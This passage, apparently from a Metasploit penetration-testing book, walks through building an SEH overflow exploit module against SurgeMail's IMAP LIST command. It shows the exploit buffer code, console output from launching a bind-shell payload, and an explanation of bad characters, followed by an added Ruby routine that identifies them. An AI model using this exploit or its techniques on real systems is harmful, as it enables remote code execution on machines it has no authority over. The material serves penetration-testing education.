210
Chapter 14
    evil = lead + payload.encoded + near + nseh + [target.ret].pack("A3")
    print_status("Sending payload")
    sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
    sock.put(sploit)
    handler
    disconnect
  end
As you can see in this listing, the initial string of As we used earlier is
replaced by NOPs, minus the length of the shellcode that Metasploit generates.
Notice that the buffer length, initially 10,356 bytes, has been decreased
by five bytes to 10,351 to account for the near jump instructions. Finally,
the malicious string is built using all of the exploit’s components.
Now we can select a real payload and execute the module to see what
happens. Surprisingly, the exploit completes but no session is created. The
exploit module connects and sends its payload, but no shell is returned to us,
as shown next:
msf exploit(surgemail_book) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(surgemail_book) > exploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >
Bad Characters and Remote Code Execution
Well, that certainly wasn’t expected: The exploit completes but no session
is created. If you check your debugger, you’ll see that the application didn’t
even crash—so what happened? Welcome to the sometimes challenging and
nearly always frustrating world of bad characters. Some characters, when sent
as part of an exploit buffer, get mangled while being read by the application.
The unfortunate result is that bad characters render your shellcode, and
sometimes the entire exploit, unusable.
When writing a Metasploit module, you should always be sure to identify
all the bad characters, because the shellcode that Metasploit generates differs
each time an exploit is launched, and any rogue bad characters will greatly
reduce a module’s reliability. In many cases, if you fail to find all the bad
characters, the application will crash without running the shellcode. In the
preceding example, SurgeMail didn’t even crash. The exploit appears to
succeed, but we don’t get a session.
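One systematic way to carry out that identification is to send a sequential byte string, capture what actually landed in memory from the debugger, and diff the two; each round adds the first mangled byte to the exclusion list until the buffer arrives intact. The Ruby below is an added example, not code from the book or from the Metasploit module: the target is stood in for by a constructed lambda (`SIMULATED_APP`) that truncates at the first NUL and turns line feeds into spaces, and in practice the `observed` bytes would be pasted in from the debugger's memory dump.

```ruby
# Added example (not from the book): find bad characters by diffing the
# sequential test string against the bytes observed in memory after sending.

# Build the test string 0x00..0xff, leaving out bytes already known to be bad
# so that the remaining bytes line up with what the debugger shows.
def badchar_test_string(known_bad = [])
  (0..255).reject { |b| known_bad.include?(b) }.pack("C*")
end

# Return the index of the first byte that differs between what was sent and
# what was observed, or nil if the whole buffer arrived intact.
def first_mangled_index(sent, observed)
  sent.bytes.each_with_index do |b, i|
    return i if observed.getbyte(i) != b
  end
  nil
end

# The byte value that should be added to the bad-character list next, or nil.
def next_bad_char(sent, observed)
  i = first_mangled_index(sent, observed)
  i && sent.getbyte(i)
end

# Repeat send/observe/diff until no byte is mangled. `app` is anything that
# takes the sent buffer and returns the bytes that ended up in memory.
def find_bad_chars(app, max_rounds: 256)
  bad = []
  max_rounds.times do
    sent = badchar_test_string(bad)
    b = next_bad_char(sent, app.call(sent))
    return bad if b.nil?
    bad << b
  end
  bad
end

# Constructed stand-in for the target (an assumption, not SurgeMail's actual
# behaviour): C-string handling truncates at the first NUL, and a line-oriented
# parser turns LF into a space.
SIMULATED_APP = lambda do |buf|
  buf.split("\x00".b, 2).first.to_s.tr("\n", " ")
end

if __FILE__ == $PROGRAM_NAME
  bad = find_bad_chars(SIMULATED_APP)
  puts "bad characters: " + bad.map { |b| format("\\x%02x", b) }.join
end
```

Against the simulated target the first round comes back empty (everything after the leading NUL is gone), the second round shows 0x0a rewritten, and the third round is clean, so the list ends up as `\x00\x0a`, which is what would go into the module's `BadChars` entry.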
There are many ways to identify bad characters, including replacing the
dynamically created shellcode with a string of sequential characters
(\x00\x01\x02…), and checking the debugger to see where the first character gets